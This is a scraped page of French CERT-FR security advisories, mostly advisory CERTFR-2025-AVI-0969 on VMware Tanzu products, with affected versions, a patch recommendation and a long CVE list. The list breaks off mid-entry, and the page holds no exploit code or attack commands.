"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Injection SQL (SQLi)"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-04-11",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7230739",
"url": "https://www.ibm.com/support/pages/node/7230739"
},
{
"published_at": "2025-04-17",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7231169",
"url": "https://www.ibm.com/support/pages/node/7231169"
},
{
"published_at": "2025-04-16",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7231051",
"url": "https://www.ibm.com/support/pages/node/7231051"
}
]
}
CERTFR-2025-AVI-0969
Vulnerability from certfr_avis - Published: 2025-11-06 - Updated: 2025-11-06
De multiples vulnérabilités ont été découvertes dans les produits VMware. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| VMware | Tanzu Kubernetes Runtime | GenAI sur Tanzu Platform pour Cloud Foundry versions antérieures à 10.2.5 | ||
| VMware | Tanzu Kubernetes Runtime | Tanzu Platform pour Cloud Foundry versions antérieures à 6.0.20+LTS-T | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Noble) versions antérieures à 1.90.x | ||
| VMware | Tanzu Kubernetes Runtime | NodeJS Buildpack versions antérieures à 1.8.58 | ||
| VMware | Tanzu Kubernetes Runtime | Python Buildpack versions antérieures à 1.8.63 | ||
| VMware | Tanzu Kubernetes Runtime | VMware Tanzu pour MySQL sur Tanzu Platform versions antérieures à 10.1.0 | ||
| VMware | Tanzu Kubernetes Runtime | API Gateway pour VMware Tanzu Platform versions antérieures à 2.4.0 | ||
| VMware | Tanzu Kubernetes Runtime | PHP Buildpack versions antérieures à 4.6.49 | ||
| VMware | Tanzu Kubernetes Runtime | Single Sign-On pour VMware Tanzu Platform versions antérieures à 1.16.14 | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Jammy FIPS) versions antérieures à 1.915.x | ||
| VMware | Tanzu Application Service | CredHub Service Broker versions antérieures à 1.6.6 | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Jammy FIPS) versions antérieures à 1.943.x | ||
| VMware | Tanzu Kubernetes Runtime | Elastic Application Runtime Windows add-on pour VMware Tanzu Platform versions antérieures à 10.2.4+LTS-T | ||
| VMware | Tanzu Kubernetes Runtime | Tanzu Platform pour Cloud Foundry Windows versions antérieures à 6.0.20+LTS-T | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Jammy) versions antérieures à 1.915.x | ||
| VMware | Tanzu Kubernetes Runtime | Tanzu Platform pour Cloud Foundry Windows versions antérieures à 10.2.3+LTS-T | ||
| VMware | Tanzu Kubernetes Runtime | Single Sign-On pour VMware Tanzu Application Service versions antérieures à 1.16.13 | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Jammy) versions antérieures à 1.943.x | ||
| VMware | Tanzu Kubernetes Runtime | Tanzu Platform pour Cloud Foundry isolation segment versions antérieures à 6.0.20+LTS-T | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Noble) versions antérieures à 1.77.x | ||
| VMware | Services Suite | Platform Automation Toolkit versions antérieures à 5.3.2 | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Jammy Azure Light) versions antérieures à 1.906.x | ||
| VMware | Tanzu Kubernetes Runtime | Spring Cloud Data Flow pour VMware Tanzu versions antérieures à 1.14.9 | ||
| VMware | Tanzu Kubernetes Runtime | App Autoscaler CLI Plugin pour VMware Tanzu Platform versions antérieures à 250.5.9 | ||
| VMware | Tanzu Kubernetes Runtime | Spring Cloud Services pour VMware Tanzu versions antérieures à 3.3.10 | ||
| VMware | Tanzu Kubernetes Runtime | Tanzu Platform pour Cloud Foundry versions antérieures à 10.2.3+LTS-T | ||
| VMware | Tanzu Kubernetes Runtime | Concourse pour VMware Tanzu versions antérieures à 7.14.1+LTS-T | ||
| VMware | Tanzu Kubernetes Runtime | Tanzu Platform pour Cloud Foundry isolation segment versions antérieures à 10.2.3+LTS-T | ||
| VMware | Tanzu Kubernetes Runtime | Platform Services pour VMware Tanzu Platform versions antérieures à 10.3.0 | ||
| VMware | Tanzu Kubernetes Runtime | Ruby Buildpack versions antérieures à 1.10.46 | ||
| VMware | Tanzu Kubernetes Runtime | Elastic Application Runtime pour VMware Tanzu Platform versions antérieures à 6.0.21+LTS-T | ||
| VMware | Tanzu Kubernetes Runtime | Telemetry pour VMware Tanzu Platform versions antérieures à 2.3.0 | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Noble) versions antérieures à 1.103.x | ||
| VMware | Tanzu Kubernetes Runtime | Tanzu Hub versions antérieures à 10.3.0 | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Jammy) versions antérieures à 1.906.x |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "GenAI sur Tanzu Platform pour Cloud Foundry versions ant\u00e9rieures \u00e0 10.2.5",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Platform pour Cloud Foundry versions ant\u00e9rieures \u00e0 6.0.20+LTS-T",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Noble) versions ant\u00e9rieures \u00e0 1.90.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "NodeJS Buildpack versions ant\u00e9rieures \u00e0 1.8.58",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Python Buildpack versions ant\u00e9rieures \u00e0 1.8.63",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "VMware Tanzu pour MySQL sur Tanzu Platform versions ant\u00e9rieures \u00e0 10.1.0",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "API Gateway pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 2.4.0",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "PHP Buildpack versions ant\u00e9rieures \u00e0 4.6.49",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Single Sign-On pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 1.16.14",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Jammy FIPS) versions ant\u00e9rieures \u00e0 1.915.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "CredHub Service Broker versions ant\u00e9rieures \u00e0 1.6.6",
"product": {
"name": "Tanzu Application Service",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Jammy FIPS) versions ant\u00e9rieures \u00e0 1.943.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Elastic Application Runtime Windows add-on pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 10.2.4+LTS-T",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Platform pour Cloud Foundry Windows versions ant\u00e9rieures \u00e0 6.0.20+LTS-T",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Jammy) versions ant\u00e9rieures \u00e0 1.915.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Platform pour Cloud Foundry Windows versions ant\u00e9rieures \u00e0 10.2.3+LTS-T",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Single Sign-On pour VMware Tanzu Application Service versions ant\u00e9rieures \u00e0 1.16.13",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Jammy) versions ant\u00e9rieures \u00e0 1.943.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Platform pour Cloud Foundry isolation segment versions ant\u00e9rieures \u00e0 6.0.20+LTS-T",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Noble) versions ant\u00e9rieures \u00e0 1.77.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Platform Automation Toolkit versions ant\u00e9rieures \u00e0 5.3.2",
"product": {
"name": "Services Suite",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Jammy Azure Light) versions ant\u00e9rieures \u00e0 1.906.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Spring Cloud Data Flow pour VMware Tanzu versions ant\u00e9rieures \u00e0 1.14.9",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "App Autoscaler CLI Plugin pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 250.5.9",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Spring Cloud Services pour VMware Tanzu versions ant\u00e9rieures \u00e0 3.3.10",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Platform pour Cloud Foundry versions ant\u00e9rieures \u00e0 10.2.3+LTS-T",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Concourse pour VMware Tanzu versions ant\u00e9rieures \u00e0 7.14.1+LTS-T",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Platform pour Cloud Foundry isolation segment versions ant\u00e9rieures \u00e0 10.2.3+LTS-T",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Platform Services pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 10.3.0",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Ruby Buildpack versions ant\u00e9rieures \u00e0 1.10.46",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Elastic Application Runtime pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 6.0.21+LTS-T",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Telemetry pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 2.3.0",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Noble) versions ant\u00e9rieures \u00e0 1.103.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Hub versions ant\u00e9rieures \u00e0 10.3.0",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Jammy) versions ant\u00e9rieures \u00e0 1.906.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2019-25013",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-25013"
},
{
"name": "CVE-2017-9937",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-9937"
},
{
"name": "CVE-2025-6395",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6395"
},
{
"name": "CVE-2022-1343",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1343"
},
{
"name": "CVE-2013-4235",
"url": "https://www.cve.org/CVERecord?id=CVE-2013-4235"
},
{
"name": "CVE-2024-37370",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37370"
},
{
"name": "CVE-2024-24790",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24790"
},
{
"name": "CVE-2024-57981",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57981"
},
{
"name": "CVE-2025-8715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8715"
},
{
"name": "CVE-2017-3613",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3613"
},
{
"name": "CVE-2025-30681",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30681"
},
{
"name": "CVE-2022-25308",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25308"
},
{
"name": "CVE-2021-3996",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3996"
},
{
"name": "CVE-2024-38807",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38807"
},
{
"name": "CVE-2023-0216",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0216"
},
{
"name": "CVE-2023-27102",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27102"
},
{
"name": "CVE-2022-43236",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43236"
},
{
"name": "CVE-2024-20919",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20919"
},
{
"name": "CVE-2023-7104",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-7104"
},
{
"name": "CVE-2022-35252",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-35252"
},
{
"name": "CVE-2005-0602",
"url": "https://www.cve.org/CVERecord?id=CVE-2005-0602"
},
{
"name": "CVE-2017-6834",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6834"
},
{
"name": "CVE-2025-22003",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22003"
},
{
"name": "CVE-2022-1473",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1473"
},
{
"name": "CVE-2023-21938",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21938"
},
{
"name": "CVE-2023-3428",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3428"
},
{
"name": "CVE-2021-3933",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3933"
},
{
"name": "CVE-2022-32189",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32189"
},
{
"name": "CVE-2022-43237",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43237"
},
{
"name": "CVE-2021-23215",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-23215"
},
{
"name": "CVE-2022-1115",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1115"
},
{
"name": "CVE-2024-57994",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57994"
},
{
"name": "CVE-2025-21798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21798"
},
{
"name": "CVE-2025-3264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3264"
},
{
"name": "CVE-2015-4789",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4789"
},
{
"name": "CVE-2025-53547",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53547"
},
{
"name": "CVE-2023-40217",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40217"
},
{
"name": "CVE-2020-14621",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14621"
},
{
"name": "CVE-2025-26465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-26465"
},
{
"name": "CVE-2025-21975",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21975"
},
{
"name": "CVE-2025-21980",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21980"
},
{
"name": "CVE-2023-0401",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0401"
},
{
"name": "CVE-2025-21889",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21889"
},
{
"name": "CVE-2025-21861",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21861"
},
{
"name": "CVE-2025-38328",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38328"
},
{
"name": "CVE-2025-31115",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31115"
},
{
"name": "CVE-2021-33294",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33294"
},
{
"name": "CVE-2023-3195",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3195"
},
{
"name": "CVE-2025-59830",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59830"
},
{
"name": "CVE-2023-21843",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21843"
},
{
"name": "CVE-2021-20243",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20243"
},
{
"name": "CVE-2023-3316",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3316"
},
{
"name": "CVE-2023-1175",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1175"
},
{
"name": "CVE-2024-57948",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57948"
},
{
"name": "CVE-2025-21937",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21937"
},
{
"name": "CVE-2014-9157",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-9157"
},
{
"name": "CVE-2020-2803",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2803"
},
{
"name": "CVE-2020-14803",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14803"
},
{
"name": "CVE-2024-58088",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58088"
},
{
"name": "CVE-2024-21235",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21235"
},
{
"name": "CVE-2025-53042",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53042"
},
{
"name": "CVE-2024-9681",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9681"
},
{
"name": "CVE-2021-37600",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37600"
},
{
"name": "CVE-2025-21689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21689"
},
{
"name": "CVE-2025-21682",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21682"
},
{
"name": "CVE-2011-3374",
"url": "https://www.cve.org/CVERecord?id=CVE-2011-3374"
},
{
"name": "CVE-2025-30689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30689"
},
{
"name": "CVE-2024-11168",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11168"
},
{
"name": "CVE-2021-26260",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-26260"
},
{
"name": "CVE-2023-0922",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0922"
},
{
"name": "CVE-2025-38100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38100"
},
{
"name": "CVE-2017-18250",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-18250"
},
{
"name": "CVE-2025-9231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9231"
},
{
"name": "CVE-2025-1372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1372"
},
{
"name": "CVE-2025-40002",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40002"
},
{
"name": "CVE-2022-21426",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21426"
},
{
"name": "CVE-2025-8851",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8851"
},
{
"name": "CVE-2024-58010",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58010"
},
{
"name": "CVE-2025-38043",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38043"
},
{
"name": "CVE-2025-21697",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21697"
},
{
"name": "CVE-2025-30715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30715"
},
{
"name": "CVE-2024-57973",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57973"
},
{
"name": "CVE-2022-24407",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24407"
},
{
"name": "CVE-2022-30631",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30631"
},
{
"name": "CVE-2022-46908",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-46908"
},
{
"name": "CVE-2022-3626",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3626"
},
{
"name": "CVE-2024-28834",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28834"
},
{
"name": "CVE-2021-38604",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-38604"
},
{
"name": "CVE-2001-1268",
"url": "https://www.cve.org/CVERecord?id=CVE-2001-1268"
},
{
"name": "CVE-2022-2874",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2874"
},
{
"name": "CVE-2025-22017",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22017"
},
{
"name": "CVE-2025-38108",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38108"
},
{
"name": "CVE-2025-21783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21783"
},
{
"name": "CVE-2025-38229",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38229"
},
{
"name": "CVE-2023-46218",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46218"
},
{
"name": "CVE-2021-3733",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3733"
},
{
"name": "CVE-2025-9714",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9714"
},
{
"name": "CVE-2025-21786",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21786"
},
{
"name": "CVE-2024-11187",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11187"
},
{
"name": "CVE-2020-27769",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-27769"
},
{
"name": "CVE-2025-30682",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30682"
},
{
"name": "CVE-2021-35586",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35586"
},
{
"name": "CVE-2014-9748",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-9748"
},
{
"name": "CVE-2025-25186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25186"
},
{
"name": "CVE-2014-8141",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-8141"
},
{
"name": "CVE-2022-1623",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1623"
},
{
"name": "CVE-2025-21881",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21881"
},
{
"name": "CVE-2025-21951",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21951"
},
{
"name": "CVE-2024-38829",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38829"
},
{
"name": "CVE-2025-10148",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-10148"
},
{
"name": "CVE-2017-6831",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6831"
},
{
"name": "CVE-2024-58034",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58034"
},
{
"name": "CVE-2025-25724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25724"
},
{
"name": "CVE-2025-27818",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27818"
},
{
"name": "CVE-2021-3997",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3997"
},
{
"name": "CVE-2025-50102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50102"
},
{
"name": "CVE-2023-38471",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38471"
},
{
"name": "CVE-2022-0158",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0158"
},
{
"name": "CVE-2020-27776",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-27776"
},
{
"name": "CVE-2025-5222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5222"
},
{
"name": "CVE-2025-21743",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21743"
},
{
"name": "CVE-2025-38147",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38147"
},
{
"name": "CVE-2023-6780",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6780"
},
{
"name": "CVE-2023-34475",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34475"
},
{
"name": "CVE-2024-26896",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26896"
},
{
"name": "CVE-2025-38286",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38286"
},
{
"name": "CVE-2025-55248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55248"
},
{
"name": "CVE-2024-24762",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24762"
},
{
"name": "CVE-2025-53643",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53643"
},
{
"name": "CVE-2022-0696",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0696"
},
{
"name": "CVE-2025-27516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27516"
},
{
"name": "CVE-2024-21144",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21144"
},
{
"name": "CVE-2024-3220",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3220"
},
{
"name": "CVE-2022-3599",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3599"
},
{
"name": "CVE-2021-39537",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39537"
},
{
"name": "CVE-2025-12380",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12380"
},
{
"name": "CVE-2022-42010",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42010"
},
{
"name": "CVE-2015-4787",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4787"
},
{
"name": "CVE-2021-35550",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35550"
},
{
"name": "CVE-2022-27781",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27781"
},
{
"name": "CVE-2025-21847",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21847"
},
{
"name": "CVE-2022-2929",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2929"
},
{
"name": "CVE-2018-15120",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-15120"
},
{
"name": "CVE-2024-58069",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58069"
},
{
"name": "CVE-2025-8556",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8556"
},
{
"name": "CVE-2023-0796",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0796"
},
{
"name": "CVE-2025-21853",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21853"
},
{
"name": "CVE-2025-21871",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21871"
},
{
"name": "CVE-2023-51385",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51385"
},
{
"name": "CVE-2016-0682",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-0682"
},
{
"name": "CVE-2025-4287",
